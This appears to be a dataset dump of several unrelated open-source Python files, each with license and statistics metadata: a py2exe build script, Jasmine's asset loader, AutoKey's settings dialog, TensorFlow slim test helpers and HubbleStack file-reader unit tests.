}
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', '%s.tex' % NAME.lower(), u'%s Documentation' % NAME,
AUTHOR, 'manual'),
]
# -- Options for manual page output --------------------------------------------
man_pages = [
('index', str(NAME.lower()), u'%s Documentation' % NAME, [AUTHOR], 1)
]
| bsd-3-clause | -4,495,656,542,323,691,500 | 26.208955 | 80 | 0.620954 | false |
nstockton/barcode-finder | setup.py | 1 | 4474 | # -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import glob
import os
import shutil
import sys
import zlib
from distutils.core import setup
import py2exe
from constants import APP_NAME, APP_VERSION, APP_AUTHOR
# ModuleFinder can't handle runtime changes to __path__, but win32com uses them
try:
# py2exe 0.6.4 introduced a replacement modulefinder.
# This means we have to add package paths there, not to the built-in one.
# If this new modulefinder gets integrated into Python, then we might be able to revert this some day.
# if this doesn't work, try import modulefinder
try:
import py2exe.mf as modulefinder
except ImportError:
import modulefinder
import win32com, sys
for p in win32com.__path__[1:]:
modulefinder.AddPackagePath("win32com", p)
for extra in ["win32com.shell"]:
__import__(extra)
m = sys.modules[extra]
for p in m.__path__[1:]:
modulefinder.AddPackagePath(extra, p)
except ImportError:
pass
# Remove the build folder if it exists.
shutil.rmtree("build", ignore_errors=True)
# do the same for dist folder if it exists.
shutil.rmtree("dist", ignore_errors=True)
# If run without args, build executables, in quiet mode.
if len(sys.argv) == 1:
sys.argv.append("py2exe")
sys.argv.append("-q")
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
# for the versioninfo resources
self.version = APP_VERSION
self.company_name = ""
self.copyright = APP_AUTHOR
self.name = APP_NAME
# The manifest will be inserted as a resource into the executable. This gives the controls the Windows XP appearance (if run on XP ;-)
manifest_template = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="5.0.0.0"
processorArchitecture="x86"
name="%(prog)s"
type="win32"
/>
<description>%(prog)s Program</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false">
</requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.VC90.CRT"
version="9.0.21022.8"
processorArchitecture="x86"
publicKeyToken="1fc8b3b9a1e18e3b">
</assemblyIdentity>
</dependentAssembly>
</dependency>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="X86"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
"""
RT_MANIFEST = 24
program = Target(
# used for the versioninfo resource
description = "%s V%s" % (APP_NAME, APP_VERSION),
# what to build
script = "%s.pyw" % APP_NAME,
other_resources = [(RT_MANIFEST, 1, manifest_template % dict(prog=APP_NAME))],
icon_resources = [(1, "%s.ico" % APP_NAME)],
dest_base = APP_NAME
)
excludes = [
"_ssl",
"_gtkagg",
"_tkagg",
"bsddb",
"curses",
"email",
"pywin.debugger",
"pywin.debugger.dbgcon",
"pywin.dialogs",
"tcl",
"Tkconstants",
"Tkinter",
"pdbunittest",
"difflib",
"pyreadline",
"optparse",
"pickle",
"calendar",
]
packages = [
"xml.etree",
"json",
"encodings.utf_8",
"encodings.ascii",
"encodings.latin_1",
"encodings.hex_codec"
]
dll_excludes = [
"libgdk-win32-2.0-0.dll",
"libgobject-2.0-0.dll",
"tcl84.dll",
"tk84.dll",
"MSVCP90.dll",
"mswsock.dll",
"powrprof.dll",
"python23.dll",
"_sre.pyd",
"_winreg.pyd",
"unicodedata.pyd",
"zlib.pyd",
"wxc.pyd",
"wxmsw24uh.dll",
"w9xpopen.exe",
]
setup(
options = {
"py2exe": {
"bundle_files": True,
"ascii": True,
"compressed": True,
"optimize": 2,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
}
},
zipfile = None,
windows = [program],
data_files = [
("sounds", glob.glob("sounds\\*")),
("speech_libs", glob.glob("speech_libs\\*")),
],
)
# Remove the build folder since we no longer need it.
shutil.rmtree("build", ignore_errors=True)
| mpl-2.0 | 1,676,056,079,268,492,300 | 21.170984 | 134 | 0.65653 | false |
mromanoff/schedule-appointment | client/vendor/bower_components/jasmine/lib/jasmine-core/core.py | 163 | 1481 | import pkg_resources
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
class Core(object):
@classmethod
def js_package(cls):
return __package__
@classmethod
def css_package(cls):
return __package__
@classmethod
def image_package(cls):
return __package__ + ".images"
@classmethod
def js_files(cls):
js_files = sorted(list(filter(lambda x: '.js' in x, pkg_resources.resource_listdir(cls.js_package(), '.'))))
# jasmine.js needs to be first
js_files.insert(0, 'jasmine.js')
# boot needs to be last
js_files.remove('boot.js')
js_files.append('boot.js')
return cls._uniq(js_files)
@classmethod
def css_files(cls):
return cls._uniq(sorted(filter(lambda x: '.css' in x, pkg_resources.resource_listdir(cls.css_package(), '.'))))
@classmethod
def favicon(cls):
return 'jasmine_favicon.png'
@classmethod
def _uniq(self, items, idfun=None):
# order preserving
if idfun is None:
def idfun(x): return x
seen = {}
result = []
for item in items:
marker = idfun(item)
# in old Python versions:
# if seen.has_key(marker)
# but in new ones:
if marker in seen:
continue
seen[marker] = 1
result.append(item)
return result | mit | 3,760,282,436,255,420,400 | 23.7 | 119 | 0.568535 | false |
linfuzki/autokey | src/lib/gtkui/settingsdialog.py | 46 | 9114 | # -*- coding: utf-8 -*-
# Copyright (C) 2011 Chris Dekter
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os, sys
from gi.repository import Gtk
from autokey.configmanager import *
from autokey import iomediator, model, common
from dialogs import GlobalHotkeyDialog
import configwindow
DESKTOP_FILE = "/usr/share/applications/autokey-gtk.desktop"
AUTOSTART_DIR = os.path.expanduser("~/.config/autostart")
AUTOSTART_FILE = os.path.join(AUTOSTART_DIR, "autokey-gtk.desktop")
ICON_NAME_MAP = {
_("Light") : common.ICON_FILE_NOTIFICATION,
_("Dark") : common.ICON_FILE_NOTIFICATION_DARK
}
ICON_NAME_LIST = []
class SettingsDialog:
KEY_MAP = GlobalHotkeyDialog.KEY_MAP
REVERSE_KEY_MAP = GlobalHotkeyDialog.REVERSE_KEY_MAP
def __init__(self, parent, configManager):
builder = configwindow.get_ui("settingsdialog.xml")
self.ui = builder.get_object("settingsdialog")
builder.connect_signals(self)
self.ui.set_transient_for(parent)
self.configManager = configManager
# General Settings
self.autoStartCheckbox = builder.get_object("autoStartCheckbox")
self.promptToSaveCheckbox = builder.get_object("promptToSaveCheckbox")
self.showTrayCheckbox = builder.get_object("showTrayCheckbox")
self.allowKbNavCheckbox = builder.get_object("allowKbNavCheckbox")
self.allowKbNavCheckbox.hide()
self.sortByUsageCheckbox = builder.get_object("sortByUsageCheckbox")
self.enableUndoCheckbox = builder.get_object("enableUndoCheckbox")
self.iconStyleCombo = Gtk.ComboBoxText.new()
hbox = builder.get_object("hbox4")
hbox.pack_start(self.iconStyleCombo, False, True, 0)
hbox.show_all()
for key, value in ICON_NAME_MAP.items():
self.iconStyleCombo.append_text(key)
ICON_NAME_LIST.append(value)
self.iconStyleCombo.set_sensitive(ConfigManager.SETTINGS[SHOW_TRAY_ICON])
self.iconStyleCombo.set_active(ICON_NAME_LIST.index(ConfigManager.SETTINGS[NOTIFICATION_ICON]))
self.autoStartCheckbox.set_active(os.path.exists(AUTOSTART_FILE))
self.promptToSaveCheckbox.set_active(ConfigManager.SETTINGS[PROMPT_TO_SAVE])
self.showTrayCheckbox.set_active(ConfigManager.SETTINGS[SHOW_TRAY_ICON])
#self.allowKbNavCheckbox.set_active(ConfigManager.SETTINGS[MENU_TAKES_FOCUS])
self.sortByUsageCheckbox.set_active(ConfigManager.SETTINGS[SORT_BY_USAGE_COUNT])
self.enableUndoCheckbox.set_active(ConfigManager.SETTINGS[UNDO_USING_BACKSPACE])
# Hotkeys
self.showConfigDlg = GlobalHotkeyDialog(parent, configManager, self.on_config_response)
self.toggleMonitorDlg = GlobalHotkeyDialog(parent, configManager, self.on_monitor_response)
self.configKeyLabel = builder.get_object("configKeyLabel")
self.clearConfigButton = builder.get_object("clearConfigButton")
self.monitorKeyLabel = builder.get_object("monitorKeyLabel")
self.clearMonitorButton = builder.get_object("clearMonitorButton")
self.useConfigHotkey = self.__loadHotkey(configManager.configHotkey, self.configKeyLabel,
self.showConfigDlg, self.clearConfigButton)
self.useServiceHotkey = self.__loadHotkey(configManager.toggleServiceHotkey, self.monitorKeyLabel,
self.toggleMonitorDlg, self.clearMonitorButton)
# Script Engine Settings
self.userModuleChooserButton = builder.get_object("userModuleChooserButton")
if configManager.userCodeDir is not None:
self.userModuleChooserButton.set_current_folder(configManager.userCodeDir)
if configManager.userCodeDir in sys.path:
sys.path.remove(configManager.userCodeDir)
def on_save(self, widget, data=None):
if self.autoStartCheckbox.get_active():
if not os.path.exists(AUTOSTART_FILE):
try:
inFile = open(DESKTOP_FILE, 'r')
outFile = open(AUTOSTART_FILE, 'w')
contents = inFile.read()
contents = contents.replace(" -c\n", "\n")
outFile.write(contents)
inFile.close()
outFile.close()
except:
pass
else:
if os.path.exists(AUTOSTART_FILE):
os.remove(AUTOSTART_FILE)
ConfigManager.SETTINGS[PROMPT_TO_SAVE] = self.promptToSaveCheckbox.get_active()
ConfigManager.SETTINGS[SHOW_TRAY_ICON] = self.showTrayCheckbox.get_active()
#ConfigManager.SETTINGS[MENU_TAKES_FOCUS] = self.allowKbNavCheckbox.get_active()
ConfigManager.SETTINGS[SORT_BY_USAGE_COUNT] = self.sortByUsageCheckbox.get_active()
ConfigManager.SETTINGS[UNDO_USING_BACKSPACE] = self.enableUndoCheckbox.get_active()
ConfigManager.SETTINGS[NOTIFICATION_ICON] = ICON_NAME_MAP[self.iconStyleCombo.get_active_text()]
self.configManager.userCodeDir = self.userModuleChooserButton.get_current_folder()
sys.path.append(self.configManager.userCodeDir)
configHotkey = self.configManager.configHotkey
toggleHotkey = self.configManager.toggleServiceHotkey
app = self.configManager.app
if configHotkey.enabled:
app.hotkey_removed(configHotkey)
configHotkey.enabled = self.useConfigHotkey
if self.useConfigHotkey:
self.showConfigDlg.save(configHotkey)
app.hotkey_created(configHotkey)
if toggleHotkey.enabled:
app.hotkey_removed(toggleHotkey)
toggleHotkey.enabled = self.useServiceHotkey
if self.useServiceHotkey:
self.toggleMonitorDlg.save(toggleHotkey)
app.hotkey_created(toggleHotkey)
app.update_notifier_visibility()
self.configManager.config_altered(True)
self.hide()
self.destroy()
def on_cancel(self, widget, data=None):
self.hide()
self.destroy()
def __getattr__(self, attr):
# Magic fudge to allow us to pretend to be the ui class we encapsulate
return getattr(self.ui, attr)
def __loadHotkey(self, item, label, dialog, clearButton):
dialog.load(item)
if item.enabled:
key = item.hotKey.encode("utf-8")
label.set_text(item.get_hotkey_string())
clearButton.set_sensitive(True)
return True
else:
label.set_text(_("(None configured)"))
clearButton.set_sensitive(False)
return False
# ---- Signal handlers
def on_showTrayCheckbox_toggled(self, widget, data=None):
self.iconStyleCombo.set_sensitive(widget.get_active())
def on_setConfigButton_pressed(self, widget, data=None):
self.showConfigDlg.run()
def on_config_response(self, res):
if res == Gtk.ResponseType.OK:
self.useConfigHotkey = True
key = self.showConfigDlg.key
modifiers = self.showConfigDlg.build_modifiers()
self.configKeyLabel.set_text(self.build_hotkey_string(key, modifiers))
self.clearConfigButton.set_sensitive(True)
def on_clearConfigButton_pressed(self, widget, data=None):
self.useConfigHotkey = False
self.clearConfigButton.set_sensitive(False)
self.configKeyLabel.set_text(_("(None configured)"))
self.showConfigDlg.reset()
def on_setMonitorButton_pressed(self, widget, data=None):
self.toggleMonitorDlg.run()
def on_monitor_response(self, res):
if res == Gtk.ResponseType.OK:
self.useServiceHotkey = True
key = self.toggleMonitorDlg.key
modifiers = self.toggleMonitorDlg.build_modifiers()
self.monitorKeyLabel.set_text(self.build_hotkey_string(key, modifiers))
self.clearMonitorButton.set_sensitive(True)
def on_clearMonitorButton_pressed(self, widget, data=None):
self.useServiceHotkey = False
self.clearMonitorButton.set_sensitive(False)
self.monitorKeyLabel.set_text(_("(None configured)"))
self.toggleMonitorDlg.reset()
| gpl-3.0 | -165,576,707,201,635,040 | 42.607656 | 107 | 0.651635 | false |
alsrgv/tensorflow | tensorflow/contrib/slim/python/slim/data/test_utils.py | 163 | 3795 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains test utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
from tensorflow.core.example import example_pb2
from tensorflow.core.example import feature_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.lib.io import tf_record
from tensorflow.python.ops import image_ops
def _encoded_int64_feature(ndarray):
return feature_pb2.Feature(int64_list=feature_pb2.Int64List(
value=ndarray.flatten().tolist()))
def _encoded_bytes_feature(tf_encoded):
encoded = tf_encoded.eval()
def string_to_bytes(value):
return feature_pb2.BytesList(value=[value])
return feature_pb2.Feature(bytes_list=string_to_bytes(encoded))
def _string_feature(value):
value = value.encode('utf-8')
return feature_pb2.Feature(bytes_list=feature_pb2.BytesList(value=[value]))
def _encoder(image, image_format):
assert image_format in ['jpeg', 'png']
if image_format == 'jpeg':
tf_image = constant_op.constant(image, dtype=dtypes.uint8)
return image_ops.encode_jpeg(tf_image)
if image_format == 'png':
tf_image = constant_op.constant(image, dtype=dtypes.uint8)
return image_ops.encode_png(tf_image)
def generate_image(image_shape, image_format='jpeg', label=0):
"""Generates an image and an example containing the encoded image.
GenerateImage must be called within an active session.
Args:
image_shape: the shape of the image to generate.
image_format: the encoding format of the image.
label: the int64 labels for the image.
Returns:
image: the generated image.
example: a TF-example with a feature key 'image/encoded' set to the
serialized image and a feature key 'image/format' set to the image
encoding format ['jpeg', 'png'].
"""
image = np.random.random_integers(0, 255, size=image_shape)
tf_encoded = _encoder(image, image_format)
example = example_pb2.Example(features=feature_pb2.Features(feature={
'image/encoded': _encoded_bytes_feature(tf_encoded),
'image/format': _string_feature(image_format),
'image/class/label': _encoded_int64_feature(np.array(label)),
}))
return image, example.SerializeToString()
def create_tfrecord_files(output_dir, num_files=3, num_records_per_file=10):
"""Creates TFRecords files.
The method must be called within an active session.
Args:
output_dir: The directory where the files are stored.
num_files: The number of files to create.
num_records_per_file: The number of records per file.
Returns:
A list of the paths to the TFRecord files.
"""
tfrecord_paths = []
for i in range(num_files):
path = os.path.join(output_dir,
'flowers.tfrecord-%d-of-%s' % (i, num_files))
tfrecord_paths.append(path)
writer = tf_record.TFRecordWriter(path)
for _ in range(num_records_per_file):
_, example = generate_image(image_shape=(10, 10, 3))
writer.write(example)
writer.close()
return tfrecord_paths
| apache-2.0 | 8,332,741,381,286,482,000 | 32.289474 | 80 | 0.704348 | false |
HubbleStack/Hubble | tests/unittests/test_readfile.py | 2 | 23431 | from __future__ import absolute_import
import json
import os
import sys
import yaml
import pytest
myPath = os.path.abspath(os.getcwd())
sys.path.insert(0, myPath)
import hubblestack.extmods.fdg.readfile
class TestReadfile():
'''
Class used to test the functions in ``readfile.py``
'''
def generate_data(self):
'''
Helping function to generate dict data to populate json/yaml files
'''
sample_data = {"id": "file",
"value": {"key1": "value1",
"key2": {"key3": "value2"}},
"menuitem": ["item1", "item2", "item3"]}
return sample_data
@pytest.fixture(scope="session")
def json_file(self, tmpdir_factory):
'''
Helping function that creates a ``.json`` sample file to test against
'''
sample_json = self.generate_data()
json_file = tmpdir_factory.mktemp("data").join("json_file.json")
json_file.write(str(json.dumps(sample_json)))
return str(json_file)
def test_json_InvalidPath_EmptyReturn(self):
'''
Test that given an invalid path, the json function returns False status
and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_json_SingleSubkey_ReturnsValue(self, json_file):
'''
Test that given a single subkey argument, the function extracts the correct value
'''
expected_status, expected_ret = True, "file"
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidSingleSubkey_EmptyReturn(self, json_file):
'''
Test that given an invalid single subkey argument,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='invalid_key')
assert expected_status == status
assert expected_ret == ret
def test_json_MultipleSubkeys_ReturnsValue(self, json_file):
'''
Test that given multiple subkeys, separated by a valid separator ``sep``,
the function returns the correct value
'''
expected_status, expected_ret = True, "value2"
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='value,key2,key3', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidSep_EmptyReturn(self, json_file):
'''
Test that given multiple subkeys separated by an invalid separator``sep``,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='value,key2,key3', sep='/')
assert expected_status == status
assert expected_ret == ret
def test_json_IndexSubkey_ReturnsValue(self, json_file):
'''
Test that given an index as subkey, the function returns the correct value
'''
expected_status, expected_ret = True, "item2"
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='menuitem,1', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidIndexSubkey_EmptyReturn(self, json_file):
'''
Test that given an index as subkey that exceeds the list length,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(
json_file, subkey='menuitem,15', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_json_EmptyFile_EmptyReturn(self, json_file):
'''
Test that given an empty json file, the function returns False status and None value
'''
with open(json_file, 'r+') as invalid_file:
invalid_file.truncate(0)
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_json_InvalidJsonFile_EmptyReturn(self, json_file):
'''
Test that given an invalid json file, the function returns False status and None value
'''
with open(json_file, 'w+') as invalid_file:
invalid_file.write("InvalidJson")
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.json(json_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
@pytest.fixture(scope="session")
def yaml_file(self, tmpdir_factory):
'''
Helping function that creates a ``.yaml`` sample file to test against
'''
sample_yaml = self.generate_data()
yaml_file = tmpdir_factory.mktemp("data").join("yaml_file.yaml")
yaml_file.write(str(yaml.dump(sample_yaml)))
return str(yaml_file)
def test_yaml_InvalidPath_EmptyReturn(self):
'''
Test that given an invalid path, the yaml function returns False status
and an empty return value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_yaml_SingleSubkey_ReturnsValue(self, yaml_file):
'''
Test that given a single subkey argument, the function extracts the appropriated value
'''
expected_status, expected_ret = True, "file"
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidSingleSubkey_EmptyReturn(self, yaml_file):
'''
Test that given an invalid single subkey argument,
the function returns False status and empty value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='invalid_key')
assert expected_status == status
assert expected_ret == ret
def test_yaml_MultipleSubkeys_ReturnsValue(self, yaml_file):
'''
Test that given multiple subkeys, separated by a valid separator,
the function returns the appropriate value
'''
expected_status, expected_ret = True, "value2"
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='value,key2,key3', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidSep_EmptyReturn(self, yaml_file):
'''
Test that given multiple subkeys separated by an invalid ``sep``,
the function returns a False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='value,key2,key3', sep='/')
assert expected_status == status
assert expected_ret == ret
def test_yaml_IndexSubkey_ReturnsValue(self, yaml_file):
'''
Test that given an index as subkey, the function returns the appropriate value
'''
expected_status, expected_ret = True, "item2"
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='menuitem,1', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_InvalidIndexSubkey_EmptyReturn(self, yaml_file):
'''
Test that given an index as subkey that exceeds the list length,
the function returns False status and None value
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(
yaml_file, subkey='menuitem,15', sep=',')
assert expected_status == status
assert expected_ret == ret
def test_yaml_EmptyFile_EmptyReturn(self, yaml_file):
'''
Test that given an empty yaml file, the function returns False status and None value
'''
with open(yaml_file, 'r+') as invalid_file:
invalid_file.truncate(0)
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def _test_yaml_InvalidJsonFile_EmptyReturn(self, yaml_file):
'''
Test that given an invalid yaml file, the function returns False status and None value
'''
with open(yaml_file, 'w+') as invalid_file:
invalid_file.write("invalidyaml")
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.yaml(yaml_file, subkey='id')
assert expected_status == status
assert expected_ret == ret
def test_checkPattern_EmptyPatternEmptyIgnore_ReturnTrue(self):
'''
Test that given an empty ``pattern`` and empty ``ignore_pattern``, the function returns True
'''
expected_ret = True
ret = hubblestack.extmods.fdg.readfile._check_pattern('Sample text', None, None)
assert expected_ret == ret
def test_checkPattern_EmptyPatternValidIgnore_ReturnFalse(self):
'''
Test that given an empty ``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
ret = hubblestack.extmods.fdg.readfile._check_pattern('invalid text', None, 'invalid.*')
assert expected_ret == ret
def test_checkPattern_EmptyPatternInvalidIgnore_ReturnTrue(self):
'''
Test that given an empty ``pattern`` and an invalid ``ignore_pattern``,
the function returns True
'''
expected_ret = True
ret = hubblestack.extmods.fdg.readfile._check_pattern('Sample text', None, 'invalid')
assert expected_ret == ret
def test_checkPattern_ValidPatternValidIgnore_ReturnFalse(self):
'''
Test that given a valid``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'valid and invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid.*', '.*invalid.*')
assert expected_ret == ret
def test_checkPattern_ValidPatternInvalidIgnore_ReturnTrue(self):
'''
Test that given a valid``pattern`` and an invalid ``ignore_pattern``,
the function returns True
'''
expected_ret = True
line = 'valid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid', 'invalid')
assert expected_ret == ret
def test_checkPattern_ValidPatternEmptyIgnore_ReturnTrue(self):
'''
Test that given a valid``pattern`` and an empty ``ignore_pattern``,
the function returns True
'''
expected_ret = True
line = 'valid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'valid', None)
assert expected_ret == ret
def test_checkPattern_InvalidPatternInvalidIgnore_ReturnFalse(self):
'''
Test that given an invalid``pattern`` and an invalid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', 'bad ignore')
assert expected_ret == ret
def test_checkPattern_InvalidPatternValidIgnore_ReturnFalse(self):
'''
Test that given an invalid``pattern`` and a valid ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', '.*invalid.*')
assert expected_ret == ret
def test_checkPattern_InvalidPatternEmptyIgnore_ReturnFalse(self):
'''
Test that given an invalid``pattern`` and an empty ``ignore_pattern``,
the function returns False
'''
expected_ret = False
line = 'Line with invalid text'
ret = hubblestack.extmods.fdg.readfile._check_pattern(line, 'bad pattern', None)
assert expected_ret == ret
def test_processLine_ValidArguments_ReturnDict(self):
'''
Test that given valid arguments, the function returns a valid dictionary
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role': 'controol',
'provider': 'aws',
'zone': '3'}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:3;provider:aws"
key, val = hubblestack.extmods.fdg.readfile._process_line(
line, dictsep='=', valsep=';', subsep=':')
assert expected_key == key
assert expected_val == val
def test_processLine_ValidArgumentsDuplicateKeys_ReturnDict(self):
'''
Test that given valid arguments, if the input data contains duplicate keys,
they will be removed from the return dict
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role': 'controol',
'provider': 'aws',
'zone': '3'}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:6;provider:aws;zone:3"
key, val = hubblestack.extmods.fdg.readfile._process_line(
line, dictsep='=', valsep=';', subsep=':')
assert expected_key == key
assert expected_val == val
def test_processLine_EmptyArguemnts_ReturnLine(self):
'''
Test that given empty arguments, the line is returned
'''
line = "line of text"
ret, none = hubblestack.extmods.fdg.readfile._process_line(line, None, None, None)
assert ret == line
assert none is None
def test_processLine_ValidDictsepValsepEmptySubsep_ReturnList(self):
'''
Test that given a valid ``dictsep``, a valid ``valsep`` and an empty ``subsep``,
a list is returned
'''
expected_key, expected_val = 'key0', ['key1', 'key2', 'val']
line = "key0:key1;key2;val"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', ';', None)
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepInvalidValsep_ReturnList(self):
'''
Test that given a valid ``dictsep`` and an invalid ``valsep``, a list is returned
'''
expected_key, expected_val = 'key0', ['key1;key2;val']
line = "key0:key1;key2;val"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', '-', None)
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepValsepInvalidSubsep_ReturnDict(self):
'''
Test that given a valid ``dictsep``, a valid ``valsep`` and an invalid ``subsep``,
a dict is returned
'''
expected_key, expected_val = 'APP_ATTRIBUTES', {'cluster_role:controol': None,
'provider:aws': None,
'zone:3': None}
line = "APP_ATTRIBUTES=cluster_role:controol;zone:3;provider:aws"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, '=', ';', '-')
assert expected_key == key
assert expected_val == val
def test_processLine_ValidDictsepSubsepInvalidValsep_ReturnDict(self):
'''
Test that given a valid ``dictsep``, a valid ``subsep`` and an invalid ``valsep``,
a dict is returned
'''
expected_key, expected_val = 'key0', {'key1;val': 'val2'}
line = "key0:key1;val-val2"
key, val = hubblestack.extmods.fdg.readfile._process_line(line, ':', '.', '-')
assert expected_key == key
assert expected_val == val
def test_processLine_InvalidDictsep_ReturnLine(self):
'''
Test that given a valid ``dictsep``, a valid ``subsep`` and an invalid ``valsep``,
a dict is returned
'''
line = "key0:key1;val-val2"
ret, none = hubblestack.extmods.fdg.readfile._process_line(line, '?', '.', '-')
assert ret == line
assert none is None
def generate_config_data(self):
'''
Sample data to use for testing the ``config`` function
'''
sample_data = ["APP_ATTRIBUTES=cluster_role:control;zone:3;provider:aws",
"APP_ATTRIBUTES=cluster_role:worker;zone:1;provider:aws",
"APP_ATTRIBUTES=cluster_role:master;zone:0;provider:aws"]
return sample_data
@pytest.fixture(scope="session")
def config_file(self, tmpdir_factory):
'''
Helping function that creates a config file to test the ``config`` function against
'''
sample_data = "\n".join(self.generate_config_data())
config_file = tmpdir_factory.mktemp("data").join("config_file")
config_file.write(sample_data)
return str(config_file)
def test_config_EmptyArguments_ReturnList(self, config_file):
'''
Test that given empty arguemtsn, the function returns a list with lines as elements
'''
expected_status, expected_ret = True, self.generate_config_data()
status, ret = hubblestack.extmods.fdg.readfile.config(config_file)
assert expected_status == status
assert expected_ret == ret
def test_config_InvalidPath_ReturnNone(self):
'''
Test that given an invalid ``path``, the function returns ``None``
'''
expected_status, expected_ret = False, None
status, ret = hubblestack.extmods.fdg.readfile.config('/invalid/path')
assert expected_status == status
assert expected_ret == ret
def test_config_OnlyDictsep_ReturnDict(self, config_file):
'''
Test that given a valid ``dictsep`` and empty arguments,
the function returns a valid ``dict``
'''
sample_data = self.generate_config_data()
expected_status, expected_ret = True, {"APP_ATTRIBUTES": [x.split("=")[1]
for x in sample_data]}
status, ret = hubblestack.extmods.fdg.readfile.config(config_file, dictsep="=")
assert expected_status == status
assert expected_ret == ret
def test_config_SamePatternIgnore_ReturnEmptyDict(self, config_file):
'''
Test that given the same ``pattern`` and ``ignore_pattern``
'''
expected_status, expected_ret = True, {}
status, ret = hubblestack.extmods.fdg.readfile.config(
config_file, pattern="APP_ATTRIBUTES", ignore_pattern="APP_ATTRIBUTES", dictsep="=")
assert expected_status == status
assert expected_ret == ret
